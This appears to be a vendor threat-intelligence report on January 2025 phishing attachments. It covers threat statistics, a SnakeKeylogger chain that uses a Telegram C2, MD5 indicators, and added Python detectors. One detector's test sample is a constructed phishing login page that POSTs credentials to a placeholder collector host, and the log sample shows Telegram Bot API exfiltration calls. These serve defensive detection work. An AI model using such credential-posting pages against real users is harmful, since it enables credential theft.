Trends Report on Phishing Emails in January 2025

Statistics on Attachment Threat Types

Statistics on Attachment Threats in January 2025

In January 2025, the most prevalent threat type among phishing email attachments was Phishing (48%). In this type, threat actors use HTML and other scripts to mimic the layouts, logos, and fonts of login and advertising pages, building deceptive pages that lure users into entering their account credentials. The threat actors then transmit the entered credentials to their C2 server or redirect the user to a fake site. This type of attack does not rely on scripts alone: it also embeds hyperlinks in documents such as PDFs to trick users into visiting phishing sites set up by the threat actors.
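The following is an added example (not ASEC's code) of how a mail gateway or analyst script could triage an HTML attachment for the traits described above: a login-style form with a password field, and a form action or script that ships the entered data to a remote host. The two HTML samples and the host name collector.example are constructed for the demonstration; the rule that an attachment has no legitimate reason to POST to a remote host is an assumption of the example.

```python
"""Heuristic scan of an HTML email attachment for credential-harvesting traits.

Added example for this report (not ASEC's code). The samples below are
constructed; collector.example is a placeholder host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ABS_URL = re.compile(r"https?://[^\s'\"<>()]+", re.I)
# JavaScript APIs commonly used to POST form contents from inside the page
JS_SEND = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|\$\.(?:post|ajax))\b")


class _FormScanner(HTMLParser):
    """Collect each <form> (action + whether it has a password input) and
    the raw bodies of all <script> elements."""

    def __init__(self):
        super().__init__()
        self.forms = []          # [{"action": str, "has_password": bool}, ...]
        self.scripts = []        # raw <script> text chunks
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "has_password": False})
        elif tag == "input" and a.get("type", "").lower() == "password":
            if not self.forms:   # password input outside any <form>
                self.forms.append({"action": "", "has_password": False})
            self.forms[-1]["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html_attachment(html: str) -> dict:
    """Return {"suspicious": bool, "findings": [str, ...]} for one attachment."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        findings.append("password input inside the attachment")
        host = urlparse(form["action"]).hostname
        if host:   # assumption: an attachment never needs to POST to a remote host
            findings.append(f"form posts credentials to remote host {host}")
    js = "\n".join(scanner.scripts)
    if JS_SEND.search(js):
        hosts = sorted({urlparse(u).hostname for u in ABS_URL.findall(js)} - {None})
        for host in hosts:
            findings.append(f"script sends data to remote host {host}")
    return {"suspicious": bool(findings), "findings": findings}


# Constructed sample: a login-page look-alike that posts to a collector host
SAMPLE_PHISH = """<html><head><title>Sign in to your account</title></head>
<body><img src="https://cdn.example/logo.png">
<form method="post" action="http://collector.example/post.php">
<input type="text" name="email"><input type="password" name="pw">
<input type="submit" value="Sign in"></form>
<script>
document.forms[0].onsubmit = function () {
  fetch('http://collector.example/log', {method: 'POST', body: new FormData(this)});
};
</script></body></html>"""

# Constructed sample: an ordinary HTML newsletter with no credential form
SAMPLE_BENIGN = """<html><body><h1>Monthly newsletter</h1>
<p>Read more at <a href="https://news.example/jan">our site</a>.</p></body></html>"""

if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html_attachment(sample))
```

The scanner deliberately scores on structure rather than on brand names, since the report notes that attackers copy layouts, logos and fonts freely; a password field plus any remote submission target is the stable signal.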

The second most common threat type is Trojan (44%). This malware tricks users into executing it by using double extensions or file names that resemble those of legitimate files.
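As an added example (not ASEC's code), the function below classifies attachment file names by the tricks named above, double extensions such as "invoice.pdf.exe" and legitimate-looking names that end in an executable extension. It goes a step beyond the report by also catching two related disguises, whitespace padding that pushes the real extension out of view and a Unicode right-to-left override that reverses the displayed suffix. The extension lists and the sample names are constructed for the demonstration.

```python
"""Flag attachment file names that disguise an executable.

Added example (not ASEC's code). The verdict is based on the *real* final
extension, i.e. what the OS will act on, after removing invisible format
characters and surrounding blanks. Sample names are constructed.
"""
import unicodedata

# Extensions that execute directly or act as script/shortcut droppers (example list)
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs",
            "vbe", "wsf", "hta", "msi", "lnk", "ps1"}
# Extensions used as the decoy half of a double extension (example list)
DECOY_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "hwp",
             "txt", "jpg", "jpeg", "png"}
RTLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE


def classify_attachment_name(name: str) -> dict:
    """Return {"executable": bool, "reasons": [str, ...]} for one file name."""
    reasons = []
    if RTLO in name:
        reasons.append("right-to-left override hides the real extension")
    # Drop Unicode format characters (category Cf: RTLO, zero-width chars, ...)
    clean = "".join(ch for ch in name if unicodedata.category(ch) != "Cf")
    parts = clean.lower().split(".")
    final = parts[-1].strip() if len(parts) > 1 else ""
    is_exec = final in EXEC_EXT
    if is_exec:
        if any(p != p.strip() for p in parts):
            reasons.append("whitespace padding pushes the real extension out of view")
        decoys = [p.strip() for p in parts[1:-1] if p.strip() in DECOY_EXT]
        if decoys:
            reasons.append(f"double extension: looks like .{decoys[-1]} but runs as .{final}")
        else:
            reasons.append(f"executable extension .{final}")
    return {"executable": is_exec, "reasons": reasons}


# Constructed sample names
SAMPLE_NAMES = [
    "Invoice_2025-01.pdf.exe",          # classic double extension
    "Quotation.docx",                   # ordinary document name
    "PO_Jan.pdf" + " " * 25 + ".scr",   # padding hides ".scr" in narrow columns
    "report\u202efdp.exe",              # renders as "reportexe.pdf", runs as .exe
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(repr(n), classify_attachment_name(n))
```

The check runs on the name the mail server sees, not on the name a user reads in the client, which is exactly the gap these tricks exploit; pairing it with a content-type check (magic bytes) closes the remaining case of a renamed executable.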

The third most common threat type is malware that steals user information (Infostealer, 4%), followed by malware that downloads additional malware from the C2 (Downloader, 2%), of which GuLoader is a prominent example. After these, security vulnerability exploits (Exploit, <1%) were detected.

Compared to last month, the share of phishing-type malware fell significantly, from 77% to 48%. The absolute number of samples also decreased, not only the percentage, indicating that overall phishing threats were relatively lower. This is also visible in the statistics under [Trend in Phishing (FakePage) Distribution Volume].

Figure 1. Statistics on attachment threats

In addition, the distribution of samples by category over the past 6 months reflects recent trends in phishing email threats. The statistics on the file extensions of attachments also show which file formats are used in phishing emails. Other statistics not covered in this summary can be found in the full ATIP report.

Distribution of Korean emails

Emails written in Korean are classified separately, and the subjects and attachment file names of the samples are partially disclosed. This makes it possible to identify keywords that frequently appear in phishing email threats.

Figure 2. A list of phishing emails distributed in Korean

Document Type

This section introduces cases of phishing emails distributed with Document-type attachments. The Document type mainly uses Word (Docx), Excel (Xlsx), Hangeul (HWP), and PDF documents, which claim that a login is required to view the document or prompt the user to download a viewer, which in turn downloads and executes malware. Malicious behavior can also be triggered at the moment the document is opened, by exploiting vulnerabilities in MS Office or Hancom Office software or by using VBA macros.

Figure 3. Attached document (.doc)

Figure 4. Extracted files – AutoIt script (left), encrypted data (right)

The malware that is ultimately executed is a variant of SnakeKeylogger, which collects various information from the system (PC) and sends it to the C2. The threat actor uses a Telegram channel as the C2. Detailed analyses of this malware are available in previous ASEC Blog posts.
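Because the C2 here is a Telegram channel, the exfiltration leaves a recognisable trace in outbound proxy logs: calls to Telegram's public Bot API (api.telegram.org/bot<id>:<token>/<method>). The script below is an added example (not ASEC's code) that pulls such calls out of proxy log lines, separates data-carrying methods from housekeeping calls, and redacts the token so the finding can be shared. The log format, host names, process name and token value are all constructed; the list of exfiltration methods is an assumption of the example.

```python
"""Spot Telegram Bot API calls in outbound proxy logs.

Added example (not ASEC's code). The log lines, hosts, process names and the
bot token below are constructed; the URL shape is Telegram's public Bot API.
"""
import re

# api.telegram.org/bot<numeric id>:<token>/<method>
TELEGRAM_BOT_CALL = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/([A-Za-z]+)")
# Methods that carry data *out* of the host (assumed list for this example)
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}
KV = re.compile(r"(\w+)=(\S+)")   # key=value fields of the constructed log format

SAMPLE_PROXY_LOG = [  # constructed sample lines
    "2025-01-15T09:12:03Z host=PC-07 proc=Invoice_0115.exe method=POST "
    "url=https://api.telegram.org/bot1234567890:AAExampleToken0000/sendDocument status=200",
    "2025-01-15T09:12:01Z host=PC-07 proc=Invoice_0115.exe method=GET "
    "url=https://api.telegram.org/bot1234567890:AAExampleToken0000/getMe status=200",
    "2025-01-15T09:13:40Z host=PC-12 proc=chrome.exe method=GET "
    "url=https://web.telegram.org/a/ status=200",
    "2025-01-15T09:14:02Z host=PC-03 proc=outlook.exe method=GET "
    "url=https://outlook.office.com/mail/ status=200",
]


def find_telegram_c2(lines):
    """Return one finding per log line that calls the Telegram Bot API."""
    hits = []
    for line in lines:
        m = TELEGRAM_BOT_CALL.search(line)
        if not m:
            continue
        bot_id, token, method = m.groups()
        fields = dict(KV.findall(line))
        hits.append({
            "host": fields.get("host"),
            "proc": fields.get("proc"),
            "bot_id": bot_id,
            "token_redacted": token[:4] + "***",   # enough to pivot on, safe to share
            "method": method,
            "exfil": method in EXFIL_METHODS,
        })
    return hits


def hosts_with_exfil(hits):
    """Hosts that actually pushed data to a bot; these get triage priority."""
    return sorted({h["host"] for h in hits if h["exfil"]})


if __name__ == "__main__":
    findings = find_telegram_c2(SAMPLE_PROXY_LOG)
    for f in findings:
        print(f)
    print("hosts with exfiltration:", hosts_with_exfil(findings))
```

Note that ordinary Telegram clients talk to web.telegram.org or the MTProto servers, not to the Bot API, so a user workstation calling api.telegram.org/bot... is worth a look on its own; the unredacted bot ID and token are the indicator to block at the proxy and to match against the sample's configuration.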

Recently, samples that build executables from AutoIt scripts and distribute them via phishing emails have increased significantly, reaching a level similar to the earlier .NET samples. Related statistics and analysis can also be found in the ASEC Blog post below.

※ Please refer to the attachment for more details.

MD5

001246ee5372966ad28b347eecc6273c
002815b806a977e440141fb51033911a
013bc2572de1a1603d79fa761d533a1d
0203eb8728954479cde22d0132037e5b
05e24915bf1d6316cd8eebd082838240